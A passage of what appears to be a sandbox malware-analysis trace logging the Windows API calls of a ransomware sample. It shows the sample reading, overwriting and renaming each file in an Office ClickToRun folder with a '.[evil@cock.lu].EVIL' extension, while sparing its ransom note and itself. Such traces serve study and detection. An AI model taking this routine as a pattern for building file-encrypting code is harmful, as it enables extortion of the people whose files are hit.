files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0083.170] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xf8ec8, lpOverlapped=0x0) returned 1 [0083.328] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.328] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.328] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.328] _errno () returned 0x84b1160840 [0083.329] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.330] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xf8ee0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xf8ee0, lpOverlapped=0x0) returned 1 [0083.331] CloseHandle (hObject=0x1a4) returned 1 [0083.341] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.341] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.341] __uncaught_exception () returned 0x84b1160800 [0083.342] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0083.352] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll.[evil@cock.lu].evil")) returned 1 [0083.352] ??_V@YAXPEAX@Z () returned 0x1 [0083.355] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll", dwFileAttributes=0x0) returned 0 [0083.355] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0083.355] wcsstr (_Str="ClientCapabilities.json", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0083.355] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json") returned 82 [0083.355] wcscmp (_String1="ClientCapabilities.json", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0083.355] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ClientCapabilities.json") returned 0x0 [0083.355] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json") returned 0x52 [0083.355] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clientcapabilities.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0083.358] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3f, lpOverlapped=0x0) returned 1 [0083.365] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.365] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.365] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.365] _errno () returned 0x84b1160840 [0083.365] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.365] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x40, lpOverlapped=0x0) returned 1 [0083.365] CloseHandle (hObject=0x1a4) returned 1 [0083.366] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.366] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.366] __uncaught_exception () returned 0x84b1160800 [0083.366] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0083.367] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clientcapabilities.json"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clientcapabilities.json.[evil@cock.lu].evil")) returned 1 [0083.474] ??_V@YAXPEAX@Z () returned 0x1 [0083.477] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json", dwFileAttributes=0x0) returned 0 [0083.477] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0083.477] wcsstr (_Str="ClientTelemetry.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0083.477] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientTelemetry.dll") returned 78 [0083.477] wcscmp (_String1="ClientTelemetry.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0083.477] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ClientTelemetry.dll") returned 0x0 [0083.477] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientTelemetry.dll") returned 0x4e [0083.477] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientTelemetry.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clienttelemetry.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0083.479] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0083.688] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.688] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.688] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.688] _errno () returned 0x84b1160840 [0083.690] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.690] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0083.753] CloseHandle (hObject=0x1a4) returned 1 [0083.775] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientTelemetry.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.775] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.775] __uncaught_exception () returned 0x84b1160800 [0083.775] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0083.793] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientTelemetry.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clienttelemetry.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientTelemetry.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clienttelemetry.dll.[evil@cock.lu].evil")) returned 1 [0083.793] ??_V@YAXPEAX@Z () returned 0x1 [0083.796] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientTelemetry.dll", dwFileAttributes=0x0) returned 0 [0083.796] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0083.796] wcsstr (_Str="concrt140.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0083.796] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0083.796] wcscmp (_String1="concrt140.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0083.796] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="concrt140.dll") returned 0x0 [0083.796] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 0x48 [0083.796] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0083.798] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x51740, lpOverlapped=0x0) returned 1 [0083.882] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.882] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.882] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.882] _errno () returned 0x84b1160840 [0083.883] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.883] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x51760, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x51760, lpOverlapped=0x0) returned 1 [0083.883] CloseHandle (hObject=0x1a4) returned 1 [0083.892] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.893] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.893] __uncaught_exception () returned 0x84b1160800 [0083.893] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0083.899] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll.[evil@cock.lu].evil")) returned 1 [0083.900] ??_V@YAXPEAX@Z () returned 0x1 [0083.904] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll", dwFileAttributes=0x0) returned 0 [0083.904] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0083.904] wcsstr (_Str="i640.hash", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0083.904] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0083.904] wcscmp (_String1="i640.hash", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0083.904] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="i640.hash") returned 0x0 [0083.904] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 0x44 [0083.904] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0083.906] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x66, lpOverlapped=0x0) returned 1 [0083.911] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.911] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.911] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.911] _errno () returned 0x84b1160840 [0083.911] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.911] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x80, lpOverlapped=0x0) returned 1 [0083.911] CloseHandle (hObject=0x1a4) returned 1 [0083.912] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.912] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.912] __uncaught_exception () returned 0x84b1160800 [0083.912] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0083.923] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.[evil@cock.lu].evil")) returned 1 [0083.923] ??_V@YAXPEAX@Z () returned 0x1 [0083.927] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", dwFileAttributes=0x0) returned 0 [0083.928] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0083.928] wcsstr (_Str="i641033.hash", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0083.928] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0083.928] wcscmp (_String1="i641033.hash", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0083.928] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="i641033.hash") returned 0x0 [0083.928] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 0x47 [0083.928] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0083.930] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x66, lpOverlapped=0x0) returned 1 [0083.934] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.934] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.934] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.934] _errno () returned 0x84b1160840 [0083.934] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.935] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x80, lpOverlapped=0x0) returned 1 [0083.935] CloseHandle (hObject=0x1a4) returned 1 [0083.935] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.936] __uncaught_exception () returned 0x84b1160800 [0083.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0084.008] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.[evil@cock.lu].evil")) returned 1 [0084.009] ??_V@YAXPEAX@Z () returned 0x1 [0084.012] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", dwFileAttributes=0x0) returned 0 [0084.012] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0084.012] wcsstr (_Str="IntegratedOffice.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0084.012] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 79 [0084.012] wcscmp (_String1="IntegratedOffice.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0084.012] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IntegratedOffice.exe") returned 0x0 [0084.012] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 0x4f [0084.012] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0084.015] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0084.174] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0084.174] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0084.174] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0084.174] _errno () returned 0x84b1160840 [0084.176] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.176] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0084.213] CloseHandle (hObject=0x1a4) returned 1 [0084.335] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0084.336] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0084.336] __uncaught_exception () returned 0x84b1160800 [0084.336] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0084.409] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.[evil@cock.lu].evil")) returned 1 [0084.410] ??_V@YAXPEAX@Z () returned 0x1 [0084.412] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe", dwFileAttributes=0x0) returned 0 [0084.413] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0084.413] wcsstr (_Str="MavInject32.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0084.413] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0084.413] wcscmp (_String1="MavInject32.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0084.413] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="MavInject32.exe") returned 0x0 [0084.413] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 0x4a [0084.413] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0084.415] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x59d28, lpOverlapped=0x0) returned 1 [0084.531] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0084.531] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0084.531] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0084.531] _errno () returned 0x84b1160840 [0084.532] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.532] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x59d40, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x59d40, lpOverlapped=0x0) returned 1 [0084.532] CloseHandle (hObject=0x1a4) returned 1 [0084.537] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0084.537] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0084.537] __uncaught_exception () returned 0x84b1160800 [0084.537] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0084.542] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe.[evil@cock.lu].evil")) returned 1 [0084.543] ??_V@YAXPEAX@Z () returned 0x1 [0084.546] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe", dwFileAttributes=0x0) returned 0 [0084.547] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0084.547] wcsstr (_Str="mso20win32client.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0084.547] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 79 [0084.547] wcscmp (_String1="mso20win32client.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0084.547] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mso20win32client.dll") returned 0x0 [0084.547] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 0x4f [0084.547] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0084.550] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0084.622] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0084.622] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0084.622] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0084.622] _errno () returned 0x84b1160840 [0084.623] SetFilePointer (in: 